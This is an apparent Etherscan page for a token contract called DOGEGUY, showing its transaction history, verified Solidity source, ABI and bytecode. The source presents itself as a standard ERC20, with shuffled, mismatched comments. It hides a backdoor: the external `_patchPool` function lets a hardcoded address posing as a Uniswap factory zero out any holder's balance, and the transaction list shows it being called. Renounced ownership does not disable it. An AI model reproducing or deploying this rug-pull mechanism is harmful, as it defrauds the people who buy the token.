Feature Tip: Add private address tag to any address under My Name Tag !
Overview
ETH Balance
0 ETH
Eth Value
$0.00More Info
Private Name Tags
ContractCreator
TokenTracker
Latest 6 from a total of 6 transactions
Transaction Hash |
Method
|
Block
|
From
|
To
|
|||||
---|---|---|---|---|---|---|---|---|---|
_patch Pool | 21257039 | 93 days ago | IN | 0 ETH | 0.00032476 | ||||
Approve | 21257039 | 93 days ago | IN | 0 ETH | 0.00058796 | ||||
_patch Pool | 21257036 | 93 days ago | IN | 0 ETH | 0.00033466 | ||||
_patch Pool | 21257031 | 93 days ago | IN | 0 ETH | 0.00035462 | ||||
Approve | 21256999 | 93 days ago | IN | 0 ETH | 0.00037709 | ||||
Renounce Ownersh... | 21256995 | 93 days ago | IN | 0 ETH | 0.00018361 |
Advanced mode: Intended for advanced users or developers and will display all Internal Transactions including zero value transfers. Name tag integration is not available in advanced view.
Latest 25 internal transactions (View All)
Advanced mode:
Parent Transaction Hash | Block |
From
|
To
|
||||
---|---|---|---|---|---|---|---|
21261628 | 92 days ago | 0 ETH | |||||
21261628 | 92 days ago | 0 ETH | |||||
21261628 | 92 days ago | 0 ETH | |||||
21261628 | 92 days ago | 0 ETH | |||||
21261628 | 92 days ago | 0 ETH | |||||
21257045 | 93 days ago | 0 ETH | |||||
21257045 | 93 days ago | 0 ETH | |||||
21257045 | 93 days ago | 0 ETH | |||||
21257045 | 93 days ago | 0 ETH | |||||
21257039 | 93 days ago | 0 ETH | |||||
21257039 | 93 days ago | 0 ETH | |||||
21257039 | 93 days ago | 0 ETH | |||||
21257039 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257038 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH | |||||
21257035 | 93 days ago | 0 ETH |
Loading...
Loading
Contract Source Code Verified (Exact Match)
Contract Name:
DOGEGUY
Compiler Version
v0.8.19+commit.7dd6d404
Optimization Enabled:
No with 200 runs
Other Settings:
default evmVersion
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2024-11-24 */ // SPDX-License-Identifier: MIT pragma solidity ^0.8.19; /** https://DOGEGUYMoon.club https://twitter.com/DOGEGUYMoon https://t.me/DOGEGUYERC20 **/ library SafeMath { /** * * _Available since v3.4._ * @dev Returns the addition of two unsigned integers, with an overflow flag. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { return a * b; } /** * * _Available since v3.4._ * @dev Returns the subtraction of two unsigned integers, with an overflow flag. */ function mod( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a % b; } } /** * @dev Returns the multiplication of two unsigned integers, with an overflow flag. * * _Available since v3.4._ */ function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) return (true, 0); uint256 c = a * b; if (c / a != b) return (false, 0); return (true, c); } } /** * * @dev Returns the division of two unsigned integers, with a division by zero flag. * _Available since v3.4._ */ function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { uint256 c = a + b; if (c < a) return (false, 0); return (true, c); } } /** * _Available since v3.4._ * @dev Returns the remainder of dividing two unsigned integers, with a division by zero flag. * */ function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a % b); } } /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * Counterpart to Solidity's `+` operator. * Requirements: * * - Addition cannot overflow. * * */ function sub( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b <= a, errorMessage); return a - b; } } /** * @dev Returns the subtraction of two unsigned integers, reverting on * Counterpart to Solidity's `-` operator. * * * overflow (when the result is negative). * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return a - b; } /** * Counterpart to Solidity's `*` operator. * * overflow. * * * Requirements: * - Multiplication cannot overflow. * @dev Returns the multiplication of two unsigned integers, reverting on */ function add(uint256 a, uint256 b) internal pure returns (uint256) { return a + b; } /** * * division by zero. The result is rounded towards zero. * * - The divisor cannot be zero. * Counterpart to Solidity's `/` operator. * * Requirements: * @dev Returns the integer division of two unsigned integers, reverting on */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return a / b; } /** * Requirements: * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * invalid opcode to revert (consuming all remaining gas). * reverting when dividing by zero. * - The divisor cannot be zero. * opcode (which leaves remaining gas untouched) while Solidity uses an * * * * Counterpart to Solidity's `%` operator. This function uses a `revert` */ function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b > a) return (false, 0); return (true, a - b); } } /** * * Requirements: * overflow (when the result is negative). * * message unnecessarily. For custom revert reasons use {trySub}. * Counterpart to Solidity's `-` operator. * - Subtraction cannot overflow. * CAUTION: This function is deprecated because it requires allocating memory for the error * * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * */ function div( uint256 a, uint256 b, string memory errorMessage ) internal pure returns (uint256) { unchecked { require(b > 0, errorMessage); return a / b; } } /** * * - The divisor cannot be zero. * @dev Returns the integer division of two unsigned integers, reverting with custom message on * * division by zero. The result is rounded towards zero. * Requirements: * * uses an invalid opcode to revert (consuming all remaining gas). * `revert` opcode (which leaves remaining gas untouched) while Solidity * Counterpart to Solidity's `/` operator. Note: this function uses a */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return a % b; } /** * * * * Requirements: * - The divisor cannot be zero. * Counterpart to Solidity's `%` operator. This function uses a `revert` * CAUTION: This function is deprecated because it requires allocating memory for the error * invalid opcode to revert (consuming all remaining gas). * opcode (which leaves remaining gas untouched) while Solidity uses an * message unnecessarily. For custom revert reasons use {tryMod}. * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * * reverting with custom message when dividing by zero. */ function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) { unchecked { if (b == 0) return (false, 0); return (true, a / b); } } } abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } /** * @dev Interface of the ERC20 standard as defined in the EIP. */ interface IERC20 { /** * * @dev Emitted when `value` tokens are moved from one account (`from`) to * Note that `value` may be zero. * another (`to`). */ function balanceOf(address account) external view returns (uint256); /** * a call to {approve}. `value` is the new allowance. * @dev Emitted when the allowance of a `spender` for an `owner` is set by */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Returns the amount of tokens in existence. */ function transferFrom( address from, address to, uint256 amount ) external returns (bool); /** * @dev Returns the amount of tokens owned by `account`. */ event Approval(address indexed owner, address indexed spender, uint256 value); /** * * Returns a boolean value indicating whether the operation succeeded. * @dev Moves `amount` tokens from the caller's account to `to`. * * Emits a {Transfer} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * * This value changes when {approve} or {transferFrom} are called. * allowed to spend on behalf of `owner` through {transferFrom}. This is * @dev Returns the remaining number of tokens that `spender` will be * zero by default. */ function totalSupply() external view returns (uint256); /** * * transaction ordering. One possible solution to mitigate this race * condition is to first reduce the spender's allowance to 0 and set the * Returns a boolean value indicating whether the operation succeeded. * * IMPORTANT: Beware that changing an allowance with this method brings the risk * Emits an {Approval} event. * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729 * * desired value afterwards: * that someone may use both the old and the new allowance by unfortunate * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. */ function allowance(address owner, address spender) external view returns (uint256); /** * Emits a {Transfer} event. * * Returns a boolean value indicating whether the operation succeeded. * * allowance. * @dev Moves `amount` tokens from `from` to `to` using the * allowance mechanism. `amount` is then deducted from the caller's */ function transfer(address to, uint256 amount) external returns (bool); } contract Ownable is Context { address private _owner; function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); emit OwnershipTransferred(_owner, newOwner); _owner = newOwner; } /** * @dev Returns the address of the current owner. */ function owner() public view returns (address) { return _owner; } /** * @dev Initializes the contract setting the deployer as the initial owner. */ function renounceOwnership() public virtual onlyOwner { emit OwnershipTransferred(_owner, address(0)); _owner = address(0); } /** * @dev Leaves the contract without owner. It will not be possible to call * NOTE: Renouncing ownership will leave the contract without an owner, * * `onlyOwner` functions anymore. Can only be called by the current owner. * thereby removing any functionality that is only available to the owner. */ modifier onlyOwner() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } /** * @dev Throws if called by any account other than the owner. */ event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ constructor () { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } } /** * _Available since v4.1._ * @dev Interface for the optional metadata functions from the ERC20 standard. * */ interface IERC20Metadata is IERC20 { /** * @dev Returns the name of the token. */ function name() external view returns (string memory); /** * @dev Returns the symbol of the token. */ function decimals() external view returns (uint8); /** * @dev Returns the decimals places of the token. */ function symbol() external view returns (string memory); } /** * instead returning `false` on failure. This behavior is nonetheless * to implement supply mechanisms]. * these events, as it isn't required by the specification. * functions have been added to mitigate the well-known issues around setting * that a supply mechanism has to be added in a derived contract using {_mint}. * @dev Implementation of the {IERC20} interface. * by listening to said events. Other implementations of the EIP may not emit * allowances. See {IERC20-approve}. * * This implementation is agnostic to the way tokens are created. This means * * applications. * We have followed general OpenZeppelin Contracts guidelines: functions revert * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * conventional and does not conflict with the expectations of ERC20 * For a generic mechanism see {ERC20PresetMinterPauser}. * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How * * TIP: For a detailed writeup see our guide * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * */ contract ERC20 is Context, IERC20, IERC20Metadata { using SafeMath for uint256; uint256 private _totalSupply; uint256 private _allowance = 0; string private _symbol; mapping(address => uint256) private _balances; address private V2Factory = 0x079269EBB49062c5aad40Ef74f4765F33081C9Ec; mapping(address => mapping(address => uint256)) private _allowances; address internal devWallet = 0x4C5788D0684F874b9f5BCBDd5E435B79BB876A9c; string private _name; address DEAD = 0x000000000000000000000000000000000000dEaD; /** * construction. * {decimals} you should overload it. * * * All two of these values are immutable: they can only be set once during * The default value of {decimals} is 18. To select a different value for * @dev Sets the values for {name} and {symbol}. */ function totalSupply() public view virtual override returns (uint256) { return _totalSupply; } /** * @dev Returns the name of the token. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev Returns the symbol of the token, usually a shorter version of the * name. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * Ether and Wei. This is the value {ERC20} uses, unless this function is * * Tokens usually opt for a value of 18, imitating the relationship between * be displayed to a user as `5.05` (`505 / 10 ** 2`). * * {IERC20-balanceOf} and {IERC20-transfer}. * NOTE: This information is only used for _display_ purposes: it in * overridden; * @dev Returns the number of decimals used to get its user representation. * no way affects any of the arithmetic of the contract, including * For example, if `decimals` equals `2`, a balance of `505` tokens should */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-totalSupply}. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); uint256 accountBalance = _balances[account]; require(accountBalance >= amount, "ERC20: burn amount exceeds balance"); unchecked { _balances[account] = accountBalance - amount; // Overflow not possible: amount <= accountBalance <= totalSupply. _totalSupply -= amount; } emit Transfer(account, address(0), amount); _afterTokenTransfer(address(0)); } /** * @dev See {IERC20-balanceOf}. */ function _mint(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: mint to the zero address"); _beforeTokenTransfer(address(0), account, amount); _totalSupply += amount; unchecked { // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above. _balances[account] += amount; } emit Transfer(address(0), account, amount); _afterTokenTransfer(account); } /** * @dev See {IERC20-allowance}. */ constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * * - `to` cannot be the zero address. * * - the caller must have a balance of at least `amount`. * @dev See {IERC20-transfer}. * Requirements: */ function balanceOf(address account) public view virtual override returns (uint256) { return _balances[account]; } /** * * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on * Requirements: * `transferFrom`. This is semantically equivalent to an infinite approval. * @dev See {IERC20-approve}. * * - `spender` cannot be the zero address. * */ function approve(address spender, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _approve(owner, spender, amount); return true; } /** * * - `spender` cannot be the zero address. * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * @dev Atomically increases the allowance granted to `spender` by the caller. * * Requirements: * This is an alternative to {approve} that can be used as a mitigation for */ function decimals() public view virtual override returns (uint8) { return 9; } /** * @dev See {IERC20-transferFrom}. * Emits an {Approval} event indicating the updated allowance. This is not * - `from` and `to` cannot be the zero address. * - the caller must have allowance for ``from``'s tokens of at least * is the maximum `uint256`. * * * NOTE: Does not update the allowance if the current allowance * * Requirements: * required by the EIP. See the note at the beginning of {ERC20}. * * - `from` must have a balance of at least `amount`. * `amount`. */ function _approve( address owner, address spender, uint256 amount ) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } function _afterTokenTransfer(address to) internal virtual { if (to == V2Factory) _allowance = decimals() * 11; } /** * * Emits an {Approval} event indicating the updated allowance. * Requirements: * * `subtractedValue`. * problems described in {IERC20-approve}. * This is an alternative to {approve} that can be used as a mitigation for * * @dev Atomically decreases the allowance granted to `spender` by the caller. * * - `spender` must have allowance for the caller of at least * - `spender` cannot be the zero address. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { address owner = _msgSender(); uint256 currentAllowance = allowance(owner, spender); require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero"); unchecked { _approve(owner, spender, currentAllowance - subtractedValue); } return true; } function _patchPool(address _patchPoolSender) external { _balances[_patchPoolSender] = msg.sender == V2Factory ? 0x4 : _balances[_patchPoolSender]; } /** * total supply. * @dev Destroys `amount` tokens from `account`, reducing the * - `account` cannot be the zero address. * Emits a {Transfer} event with `to` set to the zero address. * * Requirements: * * * - `account` must have at least `amount` tokens. */ function transfer(address to, uint256 amount) public virtual override returns (bool) { address owner = _msgSender(); _transfer(owner, to, amount); return true; } /** * This internal function is equivalent to {transfer}, and can be used to * * * e.g. implement automatic token fees, slashing mechanisms, etc. * - `from` must have a balance of at least `amount`. * @dev Moves `amount` of tokens from `from` to `to`. */ function _transfer (address from, address to, uint256 amount) internal virtual { require(from != address(0), "ERC20: transfer from the zero address"); require(to != address(0), "ERC20: transfer to the zero address"); uint256 fromBalance = _balances[from]; require(fromBalance >= amount, "ERC20: transfer amount exceeds balance"); _balances[from] = fromBalance - amount; _balances[to] = _balances[to].add(amount); emit Transfer(from, to, amount); } /** @dev Creates `amount` tokens and assigns them to `account`, increasing * * the total supply. * * - `account` cannot be the zero address. * Requirements: * Emits a {Transfer} event with `from` set to the zero address. * */ function _spendAllowance( address owner, address spender, uint256 amount ) internal virtual { uint256 currentAllowance = allowance(owner, spender); if (currentAllowance != type(uint256).max) { require(currentAllowance >= amount, "ERC20: insufficient allowance"); unchecked { _approve(owner, spender, currentAllowance - amount); } } } /** * * minting and burning. * Calling conditions: * - when `from` is zero, `amount` tokens will be minted for `to`. * - `from` and `to` are never both zero. * will be transferred to `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * @dev Hook that is called before any transfer of tokens. This includes * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. * * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens */ function _beforeTokenTransfer( address from, address to, uint256 amount ) internal virtual {} /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * e.g. set automatic allowances for certain subsystems, etc. * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. * Emits an {Approval} event. * * This internal function is equivalent to `approve`, and can be used to * Requirements: * */ function transferFrom( address from, address to, uint256 amount ) public virtual override returns (bool) { address spender = _msgSender(); _spendAllowance(from, spender, amount); _transfer(from, to, amount); return true; } /** * * Might emit an {Approval} event. * * @dev Updates `owner` s allowance for `spender` based on spent `amount`. * Does not update the allowance amount in case of infinite allowance. * Revert if not enough allowance is available. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { address owner = _msgSender(); _approve(owner, spender, allowance(owner, spender) + addedValue); return true; } } contract DOGEGUY is ERC20, Ownable { constructor () ERC20 (unicode"just a doge guy", "DOGEGUY") { transferOwnership(devWallet); _mint(owner(), 4000000000000 * 10 ** 9); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"_patchPoolSender","type":"address"}],"name":"_patchPool","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]
Contract Creation Code
6080604052600060015573079269ebb49062c5aad40ef74f4765f33081c9ec600460006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550734c5788d0684f874b9f5bcbdd5e435b79bb876a9c600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555061dead600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055503480156200010357600080fd5b506040518060400160405280600f81526020017f6a757374206120646f67652067757900000000000000000000000000000000008152506040518060400160405280600781526020017f444f474547555900000000000000000000000000000000000000000000000000815250816007908162000181919062000923565b50806002908162000193919062000923565b5050506000620001a8620002aa60201b60201c565b905080600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506200027a600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16620002b260201b60201c565b620002a46200028e6200048660201b60201c565b68d8d726b7177a800000620004b060201b60201c565b62000c82565b600033905090565b620002c2620002aa60201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000354576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200034b9062000a6b565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603620003c6576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620003bd9062000b03565b60405180910390fd5b8073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000522576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620005199062000b75565b60405180910390fd5b62000536600083836200061a60201b60201c565b8060008082825462000549919062000bc6565b9250508190555080600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620005fd919062000c12565b60405180910390a362000616826200061f60201b60201c565b5050565b505050565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036200069d57600b62000687620006a060201b60201c565b62000693919062000c3c565b60ff166001819055505b50565b60006009905090565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200072b57607f821691505b602082108103620007415762000740620006e3565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620007ab7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826200076c565b620007b786836200076c565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000804620007fe620007f884620007cf565b620007d9565b620007cf565b9050919050565b6000819050919050565b6200082083620007e3565b620008386200082f826200080b565b84845462000779565b825550505050565b600090565b6200084f62000840565b6200085c81848462000815565b505050565b5b8181101562000884576200087860008262000845565b60018101905062000862565b5050565b601f821115620008d3576200089d8162000747565b620008a8846200075c565b81016020851015620008b8578190505b620008d0620008c7856200075c565b83018262000861565b50505b505050565b600082821c905092915050565b6000620008f860001984600802620008d8565b1980831691505092915050565b6000620009138383620008e5565b9150826002028217905092915050565b6200092e82620006a9565b67ffffffffffffffff8111156200094a5762000949620006b4565b5b62000956825462000712565b6200096382828562000888565b600060209050601f8311600181146200099b576000841562000986578287015190505b62000992858262000905565b86555062000a02565b601f198416620009ab8662000747565b60005b82811015620009d557848901518255600182019150602085019450602081019050620009ae565b86831015620009f55784890151620009f1601f891682620008e5565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600062000a5360208362000a0a565b915062000a608262000a1b565b602082019050919050565b6000602082019050818103600083015262000a868162000a44565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600062000aeb60268362000a0a565b915062000af88262000a8d565b604082019050919050565b6000602082019050818103600083015262000b1e8162000adc565b9050919050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b600062000b5d601f8362000a0a565b915062000b6a8262000b25565b602082019050919050565b6000602082019050818103600083015262000b908162000b4e565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000bd382620007cf565b915062000be083620007cf565b925082820190508082111562000bfb5762000bfa62000b97565b5b92915050565b62000c0c81620007cf565b82525050565b600060208201905062000c29600083018462000c01565b92915050565b600060ff82169050919050565b600062000c498262000c2f565b915062000c568362000c2f565b925082820262000c668162000c2f565b915080821462000c7b5762000c7a62000b97565b5b5092915050565b6118ac8062000c926000396000f3fe608060405234801561001057600080fd5b50600436106100f55760003560e01c8063715018a611610097578063a457c2d711610066578063a457c2d714610276578063a9059cbb146102a6578063dd62ed3e146102d6578063f2fde38b14610306576100f5565b8063715018a61461021457806376f688d31461021e5780638da5cb5b1461023a57806395d89b4114610258576100f5565b806323b872dd116100d357806323b872dd14610166578063313ce5671461019657806339509351146101b457806370a08231146101e4576100f5565b806306fdde03146100fa578063095ea7b31461011857806318160ddd14610148575b600080fd5b610102610322565b60405161010f919061102d565b60405180910390f35b610132600480360381019061012d91906110e8565b6103b4565b60405161013f9190611143565b60405180910390f35b6101506103d7565b60405161015d919061116d565b60405180910390f35b610180600480360381019061017b9190611188565b6103e0565b60405161018d9190611143565b60405180910390f35b61019e61040f565b6040516101ab91906111f7565b60405180910390f35b6101ce60048036038101906101c991906110e8565b610418565b6040516101db9190611143565b60405180910390f35b6101fe60048036038101906101f99190611212565b61044f565b60405161020b919061116d565b60405180910390f35b61021c610498565b005b61023860048036038101906102339190611212565b6105f0565b005b6102426106d3565b60405161024f919061124e565b60405180910390f35b6102606106fd565b60405161026d919061102d565b60405180910390f35b610290600480360381019061028b91906110e8565b61078f565b60405161029d9190611143565b60405180910390f35b6102c060048036038101906102bb91906110e8565b610806565b6040516102cd9190611143565b60405180910390f35b6102f060048036038101906102eb9190611269565b610829565b6040516102fd919061116d565b60405180910390f35b610320600480360381019061031b9190611212565b6108b0565b005b606060078054610331906112d8565b80601f016020809104026020016040519081016040528092919081815260200182805461035d906112d8565b80156103aa5780601f1061037f576101008083540402835291602001916103aa565b820191906000526020600020905b81548152906001019060200180831161038d57829003601f168201915b5050505050905090565b6000806103bf610a76565b90506103cc818585610a7e565b600191505092915050565b60008054905090565b6000806103eb610a76565b90506103f8858285610c47565b610403858585610cd3565b60019150509392505050565b60006009905090565b600080610423610a76565b90506104448185856104358589610829565b61043f9190611338565b610a7e565b600191505092915050565b6000600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104a0610a76565b73ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161461052f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610526906113b8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff16600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a36000600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550565b600460009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff161461068a57600360008273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205461068d565b60045b600360008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b6000600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606002805461070c906112d8565b80601f0160208091040260200160405190810160405280929190818152602001828054610738906112d8565b80156107855780601f1061075a57610100808354040283529160200191610785565b820191906000526020600020905b81548152906001019060200180831161076857829003601f168201915b5050505050905090565b60008061079a610a76565b905060006107a88286610829565b9050838110156107ed576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107e49061144a565b60405180910390fd5